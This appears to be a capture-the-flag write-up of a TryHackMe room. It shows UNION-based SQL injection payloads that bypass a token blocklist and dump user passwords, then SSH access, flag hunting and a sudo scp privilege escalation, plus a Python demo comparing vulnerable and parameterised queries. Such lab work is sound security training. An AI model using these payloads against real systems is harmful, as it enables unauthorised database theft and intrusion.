THM Jurassic Park
Last updated
This medium-hard task will require you to enumerate the web application, get credentials to the server and find four flags hidden around the file system. Oh, Dennis Nedry has helped us to secure the app too.
You'll also want to turn up your device's volume (firefox is recommended). So, deploy the VM and get hacking.
As usual, scan the machine IP to find any open ports. The result doesn't show any interesting ports other than ssh and http.
Moving on to directory brute-forcing, the result shows some interesting paths, one of which is robots.txt. But robots.txt is a rabbit hole.
Moving to the landing page, it appears to have another path that the scanner could not detect. Clicking into the online shop redirects to shop.php, which looks like the page shown below.
Reading more into the source code, I found a juicy thing here: the ?id=1 parameter. This parameter appears to be vulnerable to SQL injection.
Let's test with the default injection, a single quote (').
Oh no, it blocks the action. Let's manually search for any other interesting parts beyond ids 1, 2 and 3.
As we can see, this development package contains some information on how the website is protected from SQL injection: it does not allow the tokens ' # DROP username @ ---- in the input, and if any of them is found it shows the message above.
Since SQL injection is not limited to these characters, let's try an asterisk (*), as it means "all" in SQL.
We managed to prove this website is prone to injection, since it only sanitises ' but not *.
Not being so familiar with SQLi, I needed to reopen my notes from my previous learning on PortSwigger. Let's start by checking the number of available columns. From there, we can inject instructions to perform our actions and gather information.
order by 1,2,3,4,5,6
This returns false, which means it has 5 columns.
Next, use union to see where each column's information is placed on the page.
From the union command, columns 1 and 3 are not suitable places for the injection since they do not appear on the page, and the price column might have some length limitation. We can use columns 2, 4 and 5. For this website, I will use column 4 since it appears to have enough space to read the information.
Since we know where to put the injection, let's find the database name and its version.
union select all 1, database(),3,version(),5
Now that we know the database name and its version, let's see what tables the database has.
union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema = database()
It shows 2 tables, items and users. Next, check the columns in the users table.
union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = "users"
We can see 3 columns inside the users table, representing id, username and password. Since we cannot use DROP, the word username, or @, we can only read the data using this method.
union select 1,2,3,password,5 from users
We managed to read the clear-text password. But who does this password belong to? Reading the room instructions, they refer to one individual who might be useful.
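The write-up's two findings, a token blocklist that misses the UNION payload and a shop lookup that concatenates the id straight into SQL, reproduced as an added example that is not the room's own code: a constructed SQLite schema with items and users tables, the vulnerable lookup beside a hardened version that validates the type and binds a parameter. The table columns, sample rows and function names are assumptions for illustration.

```python
import sqlite3

# Constructed sample schema mirroring the page's two tables; all values are made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items(id INTEGER, name TEXT, description TEXT, details TEXT, price REAL);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO items VALUES (1, 'T-Rex', 'dinosaur', 'a very large theropod', 350.0);
        INSERT INTO users VALUES (1, 'sample_user', 'sample_password');
    """)
    return db

# The blocklist the page describes: the tokens the "development package" refuses.
BLOCKED = ("'", "#", "DROP", "username", "@", "----")

def blocklist_allows(value):
    """True when none of the blocked tokens appears in the input (case-insensitive)."""
    return not any(tok.lower() in value.lower() for tok in BLOCKED)

def lookup_vulnerable(db, item_id):
    """Lookup as the page describes it: blocklist check, then raw string concatenation."""
    if not blocklist_allows(item_id):
        return None                       # the "not allowed" message on the page
    sql = f"SELECT id, name, description, details, price FROM items WHERE id = {item_id}"
    return db.execute(sql).fetchall()

def lookup_safe(db, item_id):
    """Hardened lookup: validate that id is numeric, then bind it as a parameter."""
    try:
        n = int(item_id)                   # anything that is not an integer is rejected
    except ValueError:
        return None
    sql = "SELECT id, name, description, details, price FROM items WHERE id = ?"
    return db.execute(sql, (n,)).fetchall()

# The write-up's final payload: column 4 carries the extracted value.
PAYLOAD = "1 union select 1,2,3,password,5 from users"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1'"))       # None: the quote is caught by the blocklist
    print(lookup_vulnerable(db, PAYLOAD))    # the password row appears in column 4
    print(lookup_safe(db, PAYLOAD))          # None: the payload never reaches SQL
```

Detection-wise, the same blocklist that lets the payload through also gives a useful log signal: a numeric id parameter that is not an integer is never a legitimate request.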
Since we have a username and password, let's connect via ssh.
From here, we get the first flag. Reading the other file, there appears to be a simple bash script to read flag5. (I will not use this method for privilege escalation.)
Next, check .bash_history and also .viminfo, both of which can be read. Here we found flag2 and flag3. Flag4 is located in /tmp, which is actually not available because it gets deleted automatically after a certain number of minutes.
We have the password for this user, so let's check the sudo permissions.
According to GTFOBins, this can be done using the script below.
We managed to read flag5.
Thanks for reading. Hope you enjoyed this.
Other methods for SQL injection
SCP escalation by GTFOBins
SCP escalation by copying into our machine